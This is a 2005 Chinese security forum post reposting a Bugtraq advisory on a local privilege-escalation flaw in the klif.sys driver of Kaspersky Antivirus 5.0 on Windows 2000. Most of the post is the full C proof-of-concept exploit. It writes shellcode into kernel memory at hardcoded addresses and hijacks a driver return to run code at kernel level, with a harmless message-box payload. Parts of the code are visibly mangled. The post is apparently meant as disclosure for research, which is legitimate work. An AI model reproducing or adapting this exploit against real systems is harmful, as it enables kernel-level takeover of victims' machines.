黑色海岸线论坛 - Powered by Discuz! Board

标题: Kaspersky杀毒软件klif.sys权限提升漏洞 [打印本页]

作者: Jesse 时间: 2005-6-10 19:00 标题: Kaspersky杀毒软件klif.sys权限提升漏洞

受影响系统： Kaspersky Labs Kaspersky Antivirus 5.0.335 Kaspersky Labs Kaspersky Antivirus 5.0.228 Kaspersky Labs Kaspersky Antivirus 5.0.227 描述： -------------------------------------------------------------------------------- BUGTRAQ ID: _blank>13878 Kaspersky是一款非常流行的杀毒软件。 Microsoft Windows 2000平台的Kaspersky软件设计上存在漏洞，本地攻击者可能利用此漏洞提升自己的权限。起因是Kaspersky内核驱动klif.sys没有正确丢弃高权限，攻击者可能利用这个漏洞以系统内核的权限执行任意代码。 <*来源：Ilya Rabinovich （info@softsphere.com）链接：_blank>http://marc.theaimsgroup.com/?l=bugtraq&m=111817777430401&w=2 *> 测试方法： -------------------------------------------------------------------------------- 警告以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ //(C) by Ilya Rabinovich. #include PUCHAR pCodeBase=(PUCHAR)0xBE9372C0; PDWORD pJmpAddress=(PDWORD)0xBE9372B0; PUCHAR pKAVRets[]={(PUCHAR)0xBE935087,(PUCHAR)0xBE935046}; PUCHAR pKAVRet; unsigned char code[]={0x68,0x00,0x02,0x00,0x00, //push 0x200 0x68,0x00,0x80,0x93,0xBE, //push - 0xBE938000 0x6A,0x00, //push 0 0xB8,0x00,0x00,0x00,0x00, //mov eax, -> +13 0xFF,0xD0, //call eax 0x68,0x00,0x80,0x93,0xBE, //push 0x68,0x00,0x82,0x93,0xBE, //push

- 0xBE938200 0xB8,0x00,0x00,0x00,0x00, //mov eax, -> +30 0xFF,0xD0, //call eax 0x85,0xC0, //test eax,eax 0x74,0x03, //je +03 0xC2,0x04,0x00, //retn 4 0x6A,0x00, //push 0 0x68,0x00,0x84,0x93,0xBE, //push

- 0xBE938400 0x68,0x00,0x84,0x93,0xBE, //push

- 0xBE938400 0x6A,0x00, //push 0 0xB8,0x00,0x00,0x00,0x00, //mov eax, -> +58 0xFF,0xD0, //call eax 0xC2,0x04,0x00 //retn 4 }; unsigned char jmp_code[]={0xFF,0x25,0xB0,0x72,0x93,0xBE}; //jmp dword prt \ [0xBE9372B0] ////////////////////////////////////////////////////////////// BOOLEAN LoadExploitIntoKernelMemory(void){ //Get function';s addresses HANDLE hKernel=GetModuleHandle("KERNEL32.DLL"); HANDLE hUser=GetModuleHandle("USER32.DLL"); FARPROC pGetModuleFileNameA=GetProcAddress(hKernel,"GetModuleFileNameA"); FARPROC plstrcmpiA=GetProcAddress(hKernel,"lstrcmpiA"); FARPROC pMessageBoxA=GetProcAddress(hUser,"MessageBoxA"); *(DWORD*)(code+13)=(DWORD)pGetModuleFileNameA; *(DWORD*)(code+30)=(DWORD)plstrcmpiA; *(DWORD*)(code+58)=(DWORD)pMessageBoxA; //Prepare our data into ring0-zone. PCHAR pNotepadName=(PCHAR)0xBE938200; char temp_buffer[MAX_PATH]; char *s; SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s); lstrcpy(pNotepadName,temp_buffer); PCHAR pMessage=(PCHAR)0xBE938400; lstrcpy(pMessage,"Notepad is running!!! KAV is vulnerable!!!"); memmove(pCodeBase,code,sizeof(code)); *pJmpAddress=(DWORD)pCodeBase; memmove(pKAVRet,jmp_code,sizeof(jmp_code)); return TRUE; } /////////////////////////////////////////////////////////////// void UnloadExploitFromKernelMemory(){ UCHAR retn_4[]={0xC2,0x04,0x00}; memmove(pKAVRet,retn_4,sizeof(retn_4)); } ///////////////////////////////////////////////////////////////// PUCHAR GetKAVRetAddress(void){ //Check the retn 4 in the KAV 0xBE9334E1 function end //Also, we check the KAV klif.sys existance. UCHAR retn_4[]={0xC2,0x04,0x00}; __try{ for(DWORD i=0;i,retn_4,sizeof(retn_4))==0) return pKAVRets; } }__except(EXCEPTION_EXECUTE_HANDLER){MessageBox(NULL,"KAV is not \ installed",NULL,0);return NULL;} MessageBox(NULL,"Wrong KAV version. You need 5.0.227, 5.0.228 or 5.0.335 versions of \ KAV",NULL,0); return NULL; } ///////////////////////////////////////////////////////////////// void main(void){ pKAVRet=GetKAVRetAddress(); if(NULL==pKAVRet) return; if(!LoadExploitIntoKernelMemory()) return; char temp_buffer[MAX_PATH]; char *s; SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s); PROCESS_INFORMATION pi; STARTUPINFO si={0}; si.cb=sizeof(si); CreateProcess(NULL,temp_buffer,NULL,NULL,FALSE, 0,NULL,NULL,&si,&pi); WaitForSingleObject(pi.hProcess,INFINITE); MessageBox(NULL,"Now you may start your own Notepad instance to check this \ exploit!","KAV_EXPLOITER",0); MessageBox(NULL,"Close this window to stop exploitation","KAV_EXPLOITER",0); UnloadExploitFromKernelMemory(); } 建议： -------------------------------------------------------------------------------- 厂商补丁： Kaspersky Labs -------------- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： _blank>http://www.kaspersky.com/

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/) Powered by Discuz! 7.2